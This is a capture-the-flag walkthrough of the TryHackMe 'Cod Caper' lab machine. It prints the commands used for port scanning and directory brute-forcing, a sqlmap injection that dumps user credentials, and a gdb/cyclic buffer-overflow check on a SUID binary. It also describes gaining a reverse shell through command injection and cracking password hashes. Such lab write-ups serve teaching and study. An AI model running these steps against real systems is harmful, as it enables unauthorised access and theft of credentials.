In this article we are going to solve another boot2root challenege The cod caper from tryhackme , we can deploy the machine by visitng the URL https://tryhackme.com/room/thecodcaper
IP address : 10.10.47.170
First step is to scan the target using nmap to find open ports and services.
command used : nmap -sC -sV -Pn 10.10.47.170
okay we have two ports open 80 and 22 , so we start enumerating the port 80 and we have Apache2 Ubuntu Default Page and source code doesn't revealed any useful information . So we decided to do directory bruteforce attack and for that I have used wfuzz tool because I like its clean interface (you can use any tool you want) .
command used : wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 http://10.10.47.170/FUZZ.php
umm we have got something interesting , we open up the webpage by visting the URL and we have login form .
here we tried SQL injection using the tool sqlmap .
command used : sqlmap --url http://10.10.47.170/administrator.php --dbs --forms
with the help of this we can easily find the name of the databases and then we
have to select one of them to find the tables present in it.
users database looks interesting for us , now we will try to find the name of tables inside the DB user using the command
sqlmap --url http://10.10.47.170/administrator.php --forms -D users --tables
now we have everything we want and in next command we just have to specify the database and table name and using the command we can extract all the data in table users
sqlmap --url http://10.10.47.170/administrator.php --forms -D users -T users --dump-all
okay we have the password of user pingudad , lets use these credentials and login into the admin panel.
okay we can run commands here , it is clearly a OS Command injection vulnerability we execute the command id and we got the right result as www-data , now we used a simple python reverse shell code and after executing that command we got a reverse shell
as we can see that there are two users and we need to find the password of user pingu and for that we can search it manually and we can also use find utility as
find / -user "www-data" -name "*" 2>/dev/null
after executing this command we found that password is located in /var/hidden/pass
now by using these credentials we are in as user pingu.
now we decided to check for user privileges and we have nothing , lets check for SUID binary using the command
this looks interesting and now we used gdb to analyze this binary more carefully and found that it is vulnerable to buffer overflow attack
using the command r < <(cyclic 50) we are able to overwrite the EIP address .
after that we need to find the exact byte where the program has crashed
we are almost done , now we have to find the memory address of the shell so that we can use that address and can execute the command we want.
readelf -s /opt/secret/root | grep shell
okay now we just have to make our payload and send it to the binary and after that we got the hashes of two users root and papa
we tried to crack these hashes using john and got the password for both the users .
we have used little endian format while creating our payload.
we are root now and this completes our challenge :)
NOTE : the use of command cyclic is described in the tryhackme website , you can read about the command from there.